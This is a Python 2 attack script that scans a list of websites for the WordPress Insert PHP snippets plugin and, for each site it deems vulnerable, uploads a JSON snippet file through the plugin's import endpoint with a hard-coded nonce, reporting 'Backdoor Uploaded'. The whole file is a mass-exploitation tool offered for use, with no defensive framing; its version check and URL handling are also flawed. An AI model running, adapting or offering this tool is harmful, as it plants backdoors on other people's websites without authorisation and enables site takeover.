exploit.py

import requests
import sys

def check(site):
    site += "/wp-content/plugins/insert-php/readme.txt"
    r = requests.get(site)
    data = r.text
    if "2.2.5" in data:
        return False
    else:
        return True


def exploit(site,file):
    site += "/wp-admin/admin-post.php?post_type=wbcr-snippets&page=import-wbcr_insert_php"
    files = {'wbcr_inp_import_files[]': ('hacker.json',open(file,'rb'),'application/json')}
    payload = {'action':'save', 'duplicate_action':'ignore','max_file_size':'2097152' , 'wbcr_inp_nonce':'163415d295' , '_wp_http_referer':'/wordpress/wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php','wbcr_inp_saved':'Upload files and import'}
    r = requests.post(site,files=files,data=payload)
    if  r.status_code is 200:
        return True
    return False



try:
    sites = open(sys.argv[1],"rb")
    payload_file = sys.argv[2]
except IndexError:
    print "Usage : python",sys.argv[0],"sites.txt file.json"
    exit()
except IOError:
    print "File [",sys.argv[1],"] Not Found !!"
    exit()
for site in sites:
    try:
        if 'http://' not in site or 'https://' not in site:
            site = "http://" + site[:-1]
        if check(site):
            print "[+] Vulnerable =>",site
            if exploit(site,payload_file):
                print "[+] Backdoor Uploaded Successfuly !!\n"
            else:
                print "[-] Faild To Upload Backdoor\n"
        else:
            print "[-] Not Vulnerable =>",site,"\n"
    except:
        pass